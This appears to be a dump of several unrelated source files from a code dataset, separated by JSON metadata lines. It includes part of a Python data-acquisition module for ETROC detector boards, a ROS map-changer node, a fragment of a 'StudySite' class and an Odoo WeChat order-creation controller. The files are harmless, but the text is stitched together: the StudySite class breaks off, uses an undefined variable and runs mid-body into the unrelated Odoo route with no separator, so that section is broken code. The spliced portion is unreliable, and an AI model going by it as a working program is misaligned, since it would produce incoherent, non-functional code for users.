self.stop_DAQ_event.clear()\r\n \r\n def run(self):\r\n t = threading.current_thread() # Local reference of THIS thread object\r\n t.alive = True # Thread is alive by default\r\n mem_data = []\r\n total_start_time = time.time()\r\n print(\"{} is reading data and pushing to the queue...\".format(self.getName()))\r\n while ((time.time()-total_start_time<=self.time_limit)):\r\n if self.use_IPC:\r\n try:\r\n message = self.IPC_queue.get(False)\r\n print(f'Message: {message}')\r\n if message == 'start DAQ':\r\n self.daq_on = True\r\n elif message == 'stop DAQ':\r\n self.daq_on = False\r\n elif message == 'start L1A':\r\n start_L1A(self.cmd_interpret)\r\n elif message == 'start L1A 1MHz':\r\n start_L1A_1MHz(self.cmd_interpret)\r\n elif message == 'start L1A trigger bit':\r\n start_L1A_trigger_bit(self.cmd_interpret)\r\n # elif message == 'start L1A 1MHz trigger bit':\r\n # start_L1A_1MHz_trigger_bit(self.cmd_interpret)\r\n elif message == 'start L1A trigger bit data':\r\n start_L1A_trigger_bit_data(self.cmd_interpret)\r\n elif message == 'stop L1A':\r\n stop_L1A(self.cmd_interpret)\r\n elif message == 'stop L1A 1MHz':\r\n stop_L1A_1MHz(self.cmd_interpret)\r\n elif message == 'stop L1A trigger bit':\r\n stop_L1A_trigger_bit(self.cmd_interpret)\r\n elif message == 'stop L1A 1MHz trigger bit':\r\n stop_L1A_1MHz_trigger_bit(self.cmd_interpret)\r\n elif message == 'stop L1A train':\r\n stop_L1A_train(self.cmd_interpret)\r\n elif message == 'start L1A train':\r\n 
start_L1A_train(self.cmd_interpret)\r\n elif message == 'allow threads to exit':\r\n self.stop_DAQ_event.set()\r\n elif message == 'link reset':\r\n link_reset(self.cmd_interpret)\r\n ## Special if condition for delay change during the DAQ\r\n ## Example: change delay 0x0421\r\n ## becomes: change delay 1057\r\n elif ' '.join(message.split(' ')[:2]) == 'change delay':\r\n triggerBitDelay(self.cmd_interpret, int(message.split(' ')[2], base=16))\r\n else:\r\n print(f'Unknown message: {message}')\r\n except queue.Empty:\r\n pass\r\n\r\n if self.daq_on:\r\n # max allowed by read_memory is 65535\r\n mem_data = self.cmd_interpret.read_data_fifo(self.num_fifo_read)\r\n for mem_line in mem_data:\r\n self.queue.put(mem_line) \r\n if not t.alive:\r\n print(\"Read Thread detected alive=False\")\r\n # self.is_alive = False\r\n break \r\n if self.read_thread_handle.is_set():\r\n print(\"Read Thread received STOP signal\")\r\n if not self.write_thread_handle.is_set():\r\n print(\"Sending stop signal to Write Thread\")\r\n self.write_thread_handle.set()\r\n print(\"Stopping Read Thread\")\r\n # self.is_alive = False\r\n break\r\n print(\"Read Thread gracefully sending STOP signal to other threads\") \r\n self.read_thread_handle.set()\r\n # self.is_alive = False\r\n print(\"Sending stop signal to Write Thread\")\r\n self.write_thread_handle.set()\r\n print(\"%s finished!\"%self.getName())\r\n#--------------------------------------------------------------------------#\r\n\r\n# define a write data class\r\nclass Write_data(threading.Thread):\r\n def __init__(self, name, read_queue, translate_queue, num_line, store_dict, binary_only, compressed_binary, skip_binary, make_plots, read_thread_handle, write_thread_handle, translate_thread_handle, stop_DAQ_event = None):\r\n threading.Thread.__init__(self, name=name)\r\n self.read_queue = read_queue\r\n self.translate_queue = translate_queue\r\n self.num_line = num_line\r\n self.store_dict = store_dict\r\n self.binary_only = binary_only\r\n self.compressed_binary = compressed_binary\r\n self.skip_binary = skip_binary\r\n self.make_plots = make_plots\r\n self.read_thread_handle = read_thread_handle\r\n self.write_thread_handle = write_thread_handle\r\n self.translate_thread_handle = translate_thread_handle\r\n self.stop_DAQ_event = stop_DAQ_event\r\n # self.is_alive = False\r\n\r\n # def check_alive(self):\r\n # return self.is_alive\r\n\r\n def run(self):\r\n t = threading.current_thread() # Local reference of THIS thread object\r\n t.alive = True # Thread is alive by default\r\n # self.is_alive = True\r\n file_lines = 0\r\n file_counter = 0\r\n if (not self.skip_binary):\r\n outfile = open(\"./%s/TDC_Data_%d.dat\"%(self.store_dict, file_counter), 'w')\r\n print(\"{} is reading queue and writing file {}...\".format(self.getName(), file_counter))\r\n else:\r\n print(\"{} is reading queue and pushing binary onwards...\".format(self.getName()))\r\n retry_count = 0\r\n while (True):\r\n if not t.alive:\r\n print(\"Write Thread detected alive=False\")\r\n outfile.close()\r\n # self.is_alive = False\r\n break \r\n if(file_lines>self.num_line and (not self.skip_binary)):\r\n outfile.close()\r\n file_lines=0\r\n file_counter = file_counter + 1\r\n outfile = open(\"./%s/TDC_Data_%d.dat\"%(self.store_dict, file_counter), 'w')\r\n print(\"{} is reading queue and writing file {}...\".format(self.getName(), file_counter))\r\n elif(file_lines>self.num_line):\r\n file_lines=0\r\n file_counter = file_counter + 1\r\n mem_data = \"\"\r\n # Attempt to pop off the read_queue for 30 
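            # --- Hedged driver-side sketch (message strings taken from the
            # Receive_data handler above): a controlling process feeds the DAQ
            # through IPC_queue, e.g.
            #
            #     import multiprocessing
            #     ipc = multiprocessing.Queue()
            #     # ... construct Receive_data(..., use_IPC=True,
            #     #     stop_DAQ_event=stop_event, IPC_queue=ipc) and start it ...
            #     ipc.put('start L1A trigger bit')   # QInj + L1A fast commands
            #     ipc.put('change delay 0x0421')     # retune trigger-bit delay mid-run
            #     ipc.put('stop DAQ')
            #     ipc.put('allow threads to exit')   # lets reader/writer drain and stop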
secs, fail if nothing found\r\n try:\r\n mem_data = self.read_queue.get(True, 1)\r\n retry_count = 0\r\n except queue.Empty:\r\n if not self.stop_DAQ_event.is_set():\r\n retry_count = 0\r\n continue\r\n if self.write_thread_handle.is_set():\r\n print(\"Write Thread received STOP signal AND ran out of data to write\")\r\n break\r\n retry_count += 1\r\n if retry_count < 30:\r\n continue\r\n print(\"BREAKING OUT OF WRITE LOOP CAUSE I'VE WAITING HERE FOR 30s SINCE LAST FETCH FROM READ_QUEUE!!!\")\r\n # self.read_thread_handle.set()\r\n # self.is_alive = False\r\n break\r\n # Handle the raw (binary) line\r\n if int(mem_data) == 0: continue # Waiting for IPC\r\n if int(mem_data) == 38912: continue # got a Filler\r\n if int(mem_data) == 9961472: continue # got a Filler\r\n if int(mem_data) == 2550136832: continue # got a Filler\r\n binary = format(int(mem_data), '032b')\r\n if(not self.skip_binary):\r\n if(self.compressed_binary): outfile.write('%d\\n'%int(mem_data))\r\n else: outfile.write('%s\\n'%binary)\r\n # Increment line counters\r\n file_lines = file_lines + 1\r\n # Perform translation related activities if requested\r\n if(self.make_plots or (not self.binary_only)):\r\n self.translate_queue.put(binary)\r\n if self.write_thread_handle.is_set():\r\n # print(\"Write Thread received STOP signal\")\r\n if not self.translate_thread_handle.is_set():\r\n print(\"Sending stop signal to Translate Thread\")\r\n self.translate_thread_handle.set()\r\n # print(\"Checking Read Thread from Write Thread\")\r\n # wait for read thread to die...\r\n # while(self.read_thread_handle.is_set() == False):\r\n # time.sleep(1)\r\n # self.is_alive = False\r\n print(\"Write Thread gracefully sending STOP signal to translate thread\") \r\n self.translate_thread_handle.set()\r\n self.write_thread_handle.set()\r\n # self.is_alive = False\r\n print(\"%s finished!\"%self.getName())\r\n\r\n#--------------------------------------------------------------------------#\r\nclass Translate_data(threading.Thread):\r\n def __init__(self, name, translate_queue, plot_queue, cmd_interpret, num_line, timestamp, store_dict, binary_only, make_plots, board_ID, write_thread_handle, translate_thread_handle, plotting_thread_handle, compressed_translation, stop_DAQ_event = None):\r\n threading.Thread.__init__(self, name=name)\r\n self.translate_queue = translate_queue\r\n self.plot_queue = plot_queue\r\n self.cmd_interpret = cmd_interpret\r\n self.num_line = num_line\r\n self.timestamp = timestamp\r\n self.store_dict = store_dict\r\n self.binary_only = binary_only\r\n self.make_plots = make_plots\r\n self.board_ID = board_ID\r\n self.queue_ch = [deque() for i in range(4)]\r\n self.link_ch = [\"\" for i in range(4)]\r\n self.write_thread_handle = write_thread_handle\r\n self.translate_thread_handle = translate_thread_handle\r\n self.plotting_thread_handle = plotting_thread_handle\r\n self.stop_DAQ_event = stop_DAQ_event\r\n self.hitmap = {i:np.zeros((16,16)) for i in range(4)}\r\n self.compressed_translation = compressed_translation\r\n # self.is_alive = False\r\n\r\n # def check_alive(self):\r\n # return self.is_alive\r\n\r\n def run(self):\r\n t = threading.current_thread()\r\n t.alive = True\r\n # self.is_alive = True\r\n total_lines = 0\r\n file_lines = 0\r\n file_counter = 0\r\n if(not self.binary_only): \r\n outfile = open(\"./%s/TDC_Data_translated_%d.dat\"%(self.store_dict, file_counter), 'w')\r\n print(\"{} is reading queue and translating file {}...\".format(self.getName(), file_counter))\r\n else:\r\n print(\"{} is reading queue 
and translating...".format(self.getName()))\r\n retry_count = 0\r\n while True:\r\n if not t.alive:\r\n print("Translate Thread detected alive=False")\r\n if(not self.binary_only): outfile.close()\r\n # self.is_alive = False\r\n break \r\n # if self.translate_thread_handle.is_set():\r\n # print("Translate Thread received STOP signal from Write Thread")\r\n # if(not self.binary_only): outfile.close()\r\n # break\r\n if((not self.binary_only) and file_lines>self.num_line):\r\n outfile.close()\r\n file_lines=0\r\n file_counter = file_counter + 1\r\n outfile = open("./%s/TDC_Data_translated_%d.dat"%(self.store_dict, file_counter), 'w')\r\n print("{} is reading queue and translating file {}...".format(self.getName(), file_counter))\r\n binary = ""\r\n # Attempt to pop off the translate_queue for 30 secs, fail if nothing found\r\n try:\r\n binary = self.translate_queue.get(True, 1)\r\n retry_count = 0\r\n except queue.Empty:\r\n if not self.stop_DAQ_event.is_set():\r\n retry_count = 0\r\n continue\r\n if self.translate_thread_handle.is_set():\r\n print("Translate Thread received STOP signal AND ran out of data to translate")\r\n break\r\n retry_count += 1\r\n if retry_count < 30:\r\n continue\r\n print("BREAKING OUT OF TRANSLATE LOOP BECAUSE I'VE BEEN WAITING HERE FOR 30s SINCE LAST FETCH FROM TRANSLATE_QUEUE!!! THIS SENDS STOP SIGNAL TO ALL THREADS!!!")\r\n # self.read_write_handle.set()\r\n # self.is_alive = False\r\n break\r\n TDC_data, write_flag = etroc_translate_binary(binary, self.timestamp, self.queue_ch, self.link_ch, self.board_ID, self.hitmap, self.compressed_translation)\r\n if(write_flag==1):\r\n pass\r\n # if(not self.binary_only): \r\n # outfile.write("%s\\n"%TDC_data)\r\n # file_lines = file_lines + 1\r\n # total_lines = total_lines + 1\r\n # if(TDC_data[0:6]=='ETROC1'):\r\n # if(self.make_plots): self.plot_queue.put(TDC_data)\r\n elif(write_flag==2):\r\n TDC_len = len(TDC_data)\r\n TDC_header_index = -1\r\n for j,TDC_line in enumerate(TDC_data):\r\n if(TDC_line=="HEADER_KEY"):\r\n if(TDC_header_index<0):\r\n TDC_header_index = j\r\n else:\r\n print("ERROR! 
Found more than two headers in data block!!\")\r\n sys.exit(1)\r\n continue\r\n if(not self.binary_only): \r\n if(self.compressed_translation):\r\n if(TDC_header_index<0):\r\n pass\r\n else:\r\n outfile.write(\"%s\\n\"%TDC_line)\r\n else:\r\n outfile.write(\"%s\\n\"%TDC_line)\r\n if(TDC_line[9:13]!='DATA'): continue\r\n if(self.make_plots): self.plot_queue.put(TDC_line)\r\n if(TDC_len>0):\r\n if(not self.binary_only): file_lines = file_lines + TDC_len - 1\r\n total_lines = total_lines + (TDC_len-1)\r\n if self.translate_thread_handle.is_set():\r\n # print(\"Translate Thread received STOP signal\")\r\n if not self.plotting_thread_handle.is_set():\r\n print(\"Sending stop signal to Plotting Thread\")\r\n self.plotting_thread_handle.set()\r\n # print(\"Checking Write Thread from Translate Thread\")\r\n # wait for write thread to die...\r\n # while(self.write_thread_handle.is_set() == False):\r\n # time.sleep(1)\r\n # self.is_alive = False\r\n # break\r\n \r\n print(\"Translate Thread gracefully sending STOP signal to plotting thread\") \r\n self.translate_thread_handle.set()\r\n self.plotting_thread_handle.set()\r\n # self.is_alive = False\r\n print(\"%s finished!\"%self.getName())\r\n\r\n#--------------------------------------------------------------------------#\r\nclass DAQ_Plotting(threading.Thread):\r\n def __init__(self, name, queue, timestamp, store_dict, pixel_address, board_type, board_size, plot_queue_time, translate_thread_handle, plotting_thread_handle):\r\n threading.Thread.__init__(self, name=name)\r\n self.queue = queue\r\n self.timestamp = timestamp\r\n self.store_dict = store_dict\r\n self.pixel_address = pixel_address\r\n self.board_type = board_type\r\n self.board_size = board_size\r\n self.plot_queue_time = plot_queue_time\r\n self.translate_thread_handle = translate_thread_handle\r\n self.plotting_thread_handle = plotting_thread_handle\r\n # self.is_alive = False\r\n\r\n def run(self):\r\n t = threading.current_thread()\r\n t.alive = True\r\n # self.is_alive = True\r\n\r\n ch0 = np.zeros((int(np.sqrt(self.board_size[0])),int(np.sqrt(self.board_size[0])))) \r\n ch1 = np.zeros((int(np.sqrt(self.board_size[1])),int(np.sqrt(self.board_size[1])))) \r\n ch2 = np.zeros((int(np.sqrt(self.board_size[2])),int(np.sqrt(self.board_size[2])))) \r\n ch3 = np.zeros((int(np.sqrt(self.board_size[3])),int(np.sqrt(self.board_size[3])))) \r\n\r\n plt.ion()\r\n # fig, ((ax0, ax1), (ax2, ax3)) = plt.subplots(2,2, dpi=75)\r\n fig = plt.figure(dpi=75, figsize=(5,5))\r\n gs = fig.add_gridspec(8,8)\r\n ax0 = fig.add_subplot(gs[0:int(np.sqrt(self.board_size[0]))//4, 0:int(np.sqrt(self.board_size[0]))//4])\r\n ax1 = fig.add_subplot(gs[4:4+int(np.sqrt(self.board_size[1]))//4, 0:int(np.sqrt(self.board_size[1]))//4])\r\n ax2 = fig.add_subplot(gs[0:int(np.sqrt(self.board_size[2]))//4, 4:4+int(np.sqrt(self.board_size[2]))//4])\r\n ax3 = fig.add_subplot(gs[4:4+int(np.sqrt(self.board_size[3]))//4, 4:4+int(np.sqrt(self.board_size[3]))//4])\r\n\r\n if(len(self.board_type)>0):\r\n ax0.set_title('Channel 0: ETROC {:d}'.format(self.board_type[0])) \r\n if(len(self.board_type)>1):\r\n ax1.set_title('Channel 1: ETROC {:d}'.format(self.board_type[1]))\r\n if(len(self.board_type)>2):\r\n ax2.set_title('Channel 2: ETROC {:d}'.format(self.board_type[2]))\r\n if(len(self.board_type)>3):\r\n ax3.set_title('Channel 3: ETROC {:d}'.format(self.board_type[3]))\r\n \r\n img0 = ax0.imshow(ch0, interpolation='none', vmin=1)\r\n ax0.set_aspect('equal')\r\n img1 = ax1.imshow(ch1, interpolation='none', vmin=1)\r\n 
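# vmin=1 keeps zero-count (never-hit) pixels pinned to the lowest colormap colour\r\n 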
ax1.set_aspect('equal')\r\n img2 = ax2.imshow(ch2, interpolation='none', vmin=1)\r\n ax2.set_aspect('equal')\r\n img3 = ax3.imshow(ch3, interpolation='none', vmin=1)\r\n ax3.set_aspect('equal')\r\n\r\n ax0.get_xaxis().set_visible(False)\r\n ax0.get_yaxis().set_visible(False)\r\n # ax0.set_frame_on(False)\r\n ax1.get_xaxis().set_visible(False)\r\n ax1.get_yaxis().set_visible(False)\r\n # ax1.set_frame_on(False)\r\n ax2.get_xaxis().set_visible(False)\r\n ax2.get_yaxis().set_visible(False)\r\n # ax2.set_frame_on(False)\r\n ax3.get_xaxis().set_visible(False)\r\n ax3.get_yaxis().set_visible(False)\r\n # ax3.set_frame_on(False)\r\n\r\n divider = make_axes_locatable(ax0)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img0, cax=cax, orientation='vertical')\r\n divider = make_axes_locatable(ax1)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img1, cax=cax, orientation='vertical')\r\n divider = make_axes_locatable(ax2)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img2, cax=cax, orientation='vertical')\r\n divider = make_axes_locatable(ax3)\r\n cax = divider.append_axes('right', size='5%', pad=0.05)\r\n fig.colorbar(img3, cax=cax, orientation='vertical')\r\n\r\n # plt.tight_layout()\r\n # plt.draw()\r\n # def init():etroc_translate_binary\r\n # line.set_data([], [])\r\n # return line,\r\n # def animate(i):\r\n # x = np.linspace(0, 4, 1000)\r\n # y = np.sin(2 * np.pi * (x - 0.01 * i))\r\n # line.set_data(x, y)\r\n # return line,\r\n # anim = FuncAnimation(fig, animate, init_func=init,\r\n # frames=200, interval=20, blit=False)\r\n # anim.save('sine_wave.gif', writer='imagemagick')\r\n\r\n while(True):\r\n ch0 = np.zeros((int(np.sqrt(self.board_size[0])),int(np.sqrt(self.board_size[0])))) \r\n ch1 = np.zeros((int(np.sqrt(self.board_size[1])),int(np.sqrt(self.board_size[1])))) \r\n ch2 = np.zeros((int(np.sqrt(self.board_size[2])),int(np.sqrt(self.board_size[2])))) \r\n ch3 = np.zeros((int(np.sqrt(self.board_size[3])),int(np.sqrt(self.board_size[3])))) \r\n img0.set_data(ch0)\r\n img0.autoscale()\r\n img1.set_data(ch1)\r\n img1.autoscale()\r\n img2.set_data(ch2)\r\n img2.autoscale()\r\n img3.set_data(ch3)\r\n img3.autoscale()\r\n if not t.alive:\r\n print(\"Plotting Thread detected alive=False\")\r\n # self.is_alive = False\r\n break\r\n if self.plotting_thread_handle.is_set():\r\n print(\"Plot Thread received STOP signal from Translate Thread\")\r\n # wait for translate thread to die...\r\n # while(self.translate_thread_handle.is_set() == False):\r\n # time.sleep(1)\r\n # self.is_alive = False\r\n break\r\n start_time = time.time()\r\n delta_time = 0\r\n mem_data = []\r\n while(delta_time < self.plot_queue_time):\r\n try:\r\n task = self.queue.get(False) # Empty exception is thrown right away\r\n mem_data.append(task)\r\n except queue.Empty: # Handle empty queue here\r\n pass\r\n # else: # Handle task here and call q.task_done()\r\n delta_time = time.time() - start_time\r\n\r\n for line in mem_data:\r\n words = line.split()\r\n if(words[0]==\"ETROC1\"):\r\n if(words[1]==\"0\"): ch0[(self.pixel_address[0]%4),self.pixel_address[0]//4] += 1\r\n elif(words[1]==\"1\"): ch1[(self.pixel_address[1]%4),self.pixel_address[1]//4] += 1\r\n elif(words[1]==\"2\"): ch2[(self.pixel_address[2]%4),self.pixel_address[2]//4] += 1\r\n elif(words[1]==\"3\"): ch3[(self.pixel_address[3]%4),self.pixel_address[3]//4] += 1\r\n elif(words[0]==\"ETROC2\"):\r\n if(words[2]!=\"DATA\"): continue\r\n if(words[1]==\"0\"): 
ch0[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[1]=="1"): ch1[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[1]=="2"): ch2[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[1]=="3"): ch3[15-int(words[8]),15-int(words[6])] += 1\r\n elif(words[0]=="ETROC3"): continue\r\n else: continue\r\n\r\n img0.set_data(ch0)\r\n img0.autoscale()\r\n img1.set_data(ch1)\r\n img1.autoscale()\r\n img2.set_data(ch2)\r\n img2.autoscale()\r\n img3.set_data(ch3)\r\n img3.autoscale()\r\n # ax0.relim()\r\n # ax0.autoscale_view()\r\n # ax1.relim()\r\n # ax1.autoscale_view()\r\n # ax2.relim()\r\n # ax2.autoscale_view()\r\n # ax3.relim()\r\n # ax3.autoscale_view()\r\n # plt.tight_layout()\r\n fig.canvas.draw_idle()\r\n plt.pause(0.01)\r\n print("This pass of the Plotting function loop parsed {:d} lines of output".format(len(mem_data)))\r\n\r\n plt.ioff()\r\n plt.show()\r\n\r\n # Thread then stops running\r\n # self.is_alive = False\r\n print("Plotting Thread broke out of loop")\r\n\r\n\r\n#--------------------------------------------------------------------------#\r\n\r\n## IIC write slave device\r\n# @param mode[1:0] : '0' is 1 byte read or write, '1' is 2 bytes read or write, '2' is 3 bytes read or write\r\n# @param slave[7:0] : slave device address\r\n# @param wr: 1-bit '0' is write, '1' is read\r\n# @param reg_addr[7:0] : register address\r\n# @param data[7:0] : 8-bit write data\r\ndef iic_write(mode, slave_addr, wr, reg_addr, data, cmd_interpret):\r\n val = mode << 24 | slave_addr << 17 | wr << 16 | reg_addr << 8 | data\r\n cmd_interpret.write_config_reg(4, 0xffff & val)\r\n cmd_interpret.write_config_reg(5, 0xffff & (val>>16))\r\n time.sleep(0.01)\r\n cmd_interpret.write_pulse_reg(0x0001) # reset ddr3 data fifo\r\n time.sleep(0.01)\r\n\r\n#--------------------------------------------------------------------------#\r\n## IIC read slave device\r\n# @param mode[1:0] : '0' is 1 byte read or write, '1' is 2 bytes read or write, '2' is 3 bytes read or write\r\n# @param slave[6:0]: slave device address\r\n# @param wr: 1-bit '0' is write, '1' is read\r\n# @param reg_addr[7:0] : register address\r\ndef iic_read(mode, slave_addr, wr, reg_addr, cmd_interpret):\r\n val = mode << 24 | slave_addr << 17 | 0 << 16 | reg_addr << 8 | 0x00\t # write device addr and reg addr\r\n cmd_interpret.write_config_reg(4, 0xffff & val)\r\n cmd_interpret.write_config_reg(5, 0xffff & (val>>16))\r\n time.sleep(0.01)\r\n cmd_interpret.write_pulse_reg(0x0001)\t\t\t\t # Send a pulse to IIC module\r\n\r\n val = mode << 24 | slave_addr << 17 | wr << 16 | reg_addr << 8 | 0x00\t # write device addr and read one byte\r\n cmd_interpret.write_config_reg(4, 0xffff & val)\r\n cmd_interpret.write_config_reg(5, 0xffff & (val>>16))\r\n time.sleep(0.01)\r\n cmd_interpret.write_pulse_reg(0x0001)\t\t\t\t # Send a pulse to IIC module\r\n time.sleep(0.01)\t\t\t\t\t\t\t\t\t # delay 10 ms, then read the data\r\n return cmd_interpret.read_status_reg(0) & 0xff\r\n#--------------------------------------------------------------------------#\r\n## Enable FPGA Descrambler\r\ndef Enable_FPGA_Descramblber(cmd_interpret, val=0x000b):\r\n # 0xWXYZ\r\n # Z is a 4-bit binary wxyz\r\n # z is the enable descrambler\r\n # y is disable GTX\r\n # x is polarity\r\n # w is the memo FC (active high)\r\n cmd_interpret.write_config_reg(14, val)\r\n\r\n#--------------------------------------------------------------------------#\r\n## simple readout function\r\n#@param[in]: write_num: BC0 and L1ACC loop number, 0-65535\r\ndef simple_readout(write_num, 
cmd_interpret):\r\n cmd_interpret.write_config_reg(15, 0xffff & write_num) # write enable\r\n cmd_interpret.write_pulse_reg(0x0080) # trigger pulser_reg[7]\r\n\r\n#--------------------------------------------------------------------------#\r\n## software clear fifo\r\ndef software_clear_fifo(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0002) # trigger pulser_reg[1]\r\n\r\n#--------------------------------------------------------------------------#\r\n## software clear error\r\ndef software_clear_error(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0006) # trigger pulser_reg[5]\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 15\r\n## Enable channel\r\n## 4 bit binary, WXYZ\r\n## W - ch3\r\n## X - ch2\r\n## Y - ch1\r\n## Z - ch0\r\n## Note that the input needs to be a 4-digit 16 bit hex, 0x000(WXYZ)\r\ndef active_channels(cmd_interpret, key = 0x0003): \r\n cmd_interpret.write_config_reg(15, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 13\r\n## TimeStamp and Testmode\r\n## Following is binary key, 4 bit binary WXYZ\r\n## 0000: Enable Testmode & Enable TimeStamp\r\n## 0001: Enable Testmode & Disable TimeStamp\r\n## 0010: Disable Testmode & Enable TimeStamp\r\n## 0011: Disable Testmode & Disable TimeStamp ##BUGGED as of 03-04-2023\r\n## Note that the input needs to be a 4-digit 16 bit hex, 0x000(WXYZ)\r\ndef timestamp(cmd_interpret, key=0x0000):\r\n cmd_interpret.write_config_reg(13, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 12\r\n## 4-digit 16 bit hex, 0xWXYZ\r\n## WX (8 bit) - Duration\r\n## Y - N/A,N/A,Period,Hold\r\n## Z - Input command\r\ndef register_12(cmd_interpret, key = 0x0000): \r\n cmd_interpret.write_config_reg(12, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 11\r\n## 4-digit 16 bit hex, 0xWXYZ\r\n## WX (8 bit) - N/A\r\n## YZ (8 bit) - Error Mask\r\ndef register_11(cmd_interpret, key = 0x0000): \r\n cmd_interpret.write_config_reg(11, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 8\r\n## 4-digit 16 bit hex\r\n## LSB 10 bits are delay, LSB 11th bit is delay enabled\r\n## 0000||0100||0000||0000 = 0x0400: shift of one clock cycle\r\ndef triggerBitDelay(cmd_interpret, key = 0x0400): \r\n cmd_interpret.write_config_reg(8, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Register 7\r\n## 4-digit 16 bit hex\r\n## LSB 6 bits - time (s) for FPGA counters\r\ndef counterDuration(cmd_interpret, key = 0x0005): \r\n cmd_interpret.write_config_reg(7, key)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Fast Command Signal Start\r\ndef fc_signal_start(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0004)\r\n\r\n#--------------------------------------------------------------------------#\r\n## Fast Command Initialize pulse\r\n## MSB..10000\r\ndef fc_init_pulse(cmd_interpret):\r\n cmd_interpret.write_pulse_reg(0x0010)\r\n","repo_name":"CMS-ETROC/ETROC-DAQ","sub_path":"daq_helpers.py","file_name":"daq_helpers.py","file_ext":"py","file_size_in_byte":43681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"41133579843","text":"#!/usr/bin/env python3\nimport rospy\nimport ruamel.yaml\nfrom pathlib import Path\nfrom std_msgs.msg import UInt16\nfrom std_srvs.srv 
import Empty, Trigger\nfrom nav_msgs.srv import LoadMap\n\n\nNODE_NAME = "map_changer"\n\n\nclass MultiMapChanger:\n def __init__(self):\n yaml = ruamel.yaml.YAML()\n ## Read multimaps directory\n self.multimap_dir = rospy.get_param(NODE_NAME + "/multi_map_dir")\n self.multimap_dir = Path(self.multimap_dir).resolve()\n self.current_map_num = 0\n ## Read waypoints file and change point number\n self.change_point_num = []\n self.next_map_idx = []\n waypoints_path = rospy.get_param(NODE_NAME + "/waypoints_file")\n with open(waypoints_path) as file:\n waypoints_yaml = yaml.load(file)\n for i, data in enumerate(waypoints_yaml["waypoints"]):\n if "change_map" in data["point"]:\n self.change_point_num.append(i + 2)\n self.next_map_idx.append(data["point"]["change_map"])\n ## Service clients\n self.change_map = rospy.ServiceProxy("/change_map", LoadMap)\n self.amcl_update = rospy.ServiceProxy("/request_nomotion_update", Empty)\n self.stop_nav = rospy.ServiceProxy("/stop_wp_nav", Trigger)\n self.resume_nav = rospy.ServiceProxy("/resume_nav", Trigger)\n ## Subscribe current waypoint number\n self.waypoint_num = 0\n self.wp_num_sub = rospy.Subscriber(\n "/waypoint_num", UInt16, self.waypoint_num_callback\n )\n return\n\n def waypoint_num_callback(self, msg):\n if msg.data == self.waypoint_num:\n return\n try:\n idx = self.change_point_num.index(msg.data)\n self.current_map_num = self.next_map_idx[idx]\n self.change_map_service_call()\n except ValueError:\n pass\n\n self.waypoint_num = msg.data\n return\n\n def change_map_service_call(self):\n self.stop_nav()\n rospy.sleep(0.5)\n self.update_amcl_call()\n rospy.wait_for_service("/change_map")\n try:\n res = self.change_map(\n str(self.multimap_dir / Path("map{}.yaml".format(self.current_map_num)))\n )\n if res.result == 0:\n rospy.loginfo("Successfully changed the map")\n self.update_amcl_call()\n self.resume_nav()\n return True\n else:\n rospy.logerr("Failed to change the map: result=%s", res.result)\n\n except rospy.ServiceException:\n rospy.logerr("Change map service call failed")\n return False\n\n def update_amcl_call(self):\n rospy.wait_for_service("/request_nomotion_update")\n for i in range(0, 5):\n self.amcl_update()\n rospy.sleep(0.5)\n rospy.loginfo("Update amcl pose 5 times")\n\n\nif __name__ == "__main__":\n rospy.init_node(NODE_NAME)\n mmc = MultiMapChanger()\n rospy.spin()\n","repo_name":"KBKN-Autonomous-Robotics-Lab/multi_map_manager","sub_path":"map_changer/scripts/map_changer.py","file_name":"map_changer.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"43746040665","text":"import numpy as np\nimport urllib.request\nfrom zipfile import ZipFile\nimport os\n\nclass StudySite:\n def __init__(self, left, right, bottom, top):\n self.left = int(str(left)[:4])\n self.right = int(str(right)[:4])\n self.bottom = int(str(bottom)[:4])\n self.top = int(str(top)[:4])\n \n self.bounds = [left, right, bottom, top]\n self.crs = epsg_code\n \n links = np.genfromtxt('download_links.csv', dtype=str)\n\n @http.route('/wxa/<string:sub_domain>/order/create',\n auth='public', methods=['POST'], csrf=False, type='http')\n def create(self, sub_domain, **kwargs):\n token = kwargs.pop('token', None)\n team_id = kwargs.pop('team', None)\n try:\n res, wechat_user, entry = self._check_user(sub_domain, token)\n if res:return res\n\n res = self.pre_check(entry, wechat_user, kwargs)\n if res:return res\n\n # 
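sample goodsJsonStr payload, e.g. 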
[{\"goodsId\":1,\"number\":3,\"propertyChildIds\":\"1:1,2:4,\",\"logisticsType\":0, \"inviter_id\":0}]\n goods_json = json.loads(kwargs.pop('goodsJsonStr'))\n\n province_id = int(kwargs.pop('provinceId')) if kwargs.get('provinceId', 'false')!='false' else False\n city_id = int(kwargs.pop('cityId')) if kwargs.get('cityId', 'false')!='false' else False\n district_id = int(kwargs.pop('districtId')) if kwargs.get('districtId', 'false')!='false' else False\n addr_id = int(kwargs.pop('addrid')) if 'addrid' in kwargs else False\n zipcode = kwargs.pop('code') if 'code' in kwargs else False\n link_man = kwargs.pop('linkMan') if 'linkMan' in kwargs else False\n\n calculate = kwargs.pop('calculate', False)\n if calculate=='false':\n calculate = False\n remark = kwargs.pop('remark', '')\n\n goods_price, logistics_price, order_lines, isNeedLogistics = self.parse_goods_json(\n goods_json, province_id, city_id, district_id, calculate\n )\n if not addr_id:\n address = request.env(user=1)['res.partner'].search([\n ('parent_id', '=', wechat_user.partner_id.id),\n ('type', '=', 'delivery'),\n ('is_default', '=', True)\n ], limit=1)\n if address:\n addr_id = address.id\n\n order_dict = {\n 'zipcode': zipcode,\n 'partner_id': wechat_user.partner_id.id,\n 